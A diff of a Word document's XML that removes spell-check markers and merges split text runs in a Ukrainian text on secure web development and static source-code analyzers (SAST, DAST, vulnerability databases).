                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20441,7 +18665,6 @@
               </w:rPr>
               <w:t xml:space="preserve"> на стороні сервера.</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -20629,7 +18852,6 @@
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -20700,7 +18922,6 @@
               </w:rPr>
               <w:t xml:space="preserve"> певною схемою, включаючи допустимі символи, довжини і структури (наприклад, номери кредитних карт або по телефону</w:t>
             </w:r>
-            <w:proofErr w:type="gramEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -22252,29 +20473,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>140-2 або екві</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>валентного</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> стандарту.</w:t>
+              <w:t>140-2 або еквівалентного стандарту.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22758,51 +20957,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>в</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>тому</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>, що життєвий цикл</w:t>
+              <w:t>Переконайтеся в тому, що життєвий цикл</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -23890,29 +22045,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Перша група </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>включає в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
+        <w:t xml:space="preserve">Перша група включає в себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23946,29 +22079,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
+        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів відносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24002,9 +22113,8 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на різних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори статичного коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24013,9 +22123,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:lastRenderedPageBreak/>
+        <w:t>зазначити, що більшість з аналізаторів відносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити різні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24024,116 +22134,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>статичного</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">зазначити, що більшість з аналізаторів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">туп до вихідних текстів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ідсутн</w:t>
+        <w:t>туп до вихідних текстів відсутн</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -24154,9 +22155,8 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів відповідності та можливість виконання вимог різних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім світом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24165,9 +22165,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:lastRenderedPageBreak/>
+        <w:t>(підвантажуваних модулів, використовуваного стороннього</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24176,9 +22176,8 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідповідності та можливість виконання вимог </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve"> програмного забезпечення і т. д</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24187,115 +22186,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>св</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ідвантажуваних модулів, використовуваного стороннього</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> програмного забезпечення і т. д</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ішення по прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
+        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття рішення по прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24398,9 +22289,8 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">. Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують різні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і досліджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. Якість власної бази - один з ключових критеріїв, що впливає на загальну якість роботи продукту. Крім того, власна база повинна бути динамічною і постійно оновлюваною - нові вектори атак і експлуатації вразливостей, а також зміни в мовах програмування і методи розробки вимагають від розробників аналізаторів виконувати постійні оновлення бази для збереження високої якості перевірки. Продукти зі статичної неоновлюваної базою найчастіше програють в порівняльних тестах. </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24409,227 +22299,8 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ізні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>досл</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">іджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. Якість власної бази - один з ключових критеріїв, що впливає на загальну якість роботи продукту. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>Кр</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ім того, власна база повинна бути динамічною і постійно оновлюваною - нові вектори атак і експлуатації вразливостей, а також зміни в мовах програмування і методи розробки вимагають від розробників аналізаторів виконувати постійні оновлення бази для збереження високої якості перевірки. Продукти зі статичної неоновлюваної базою найчастіше програють </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>пор</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">івняльних тестах. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
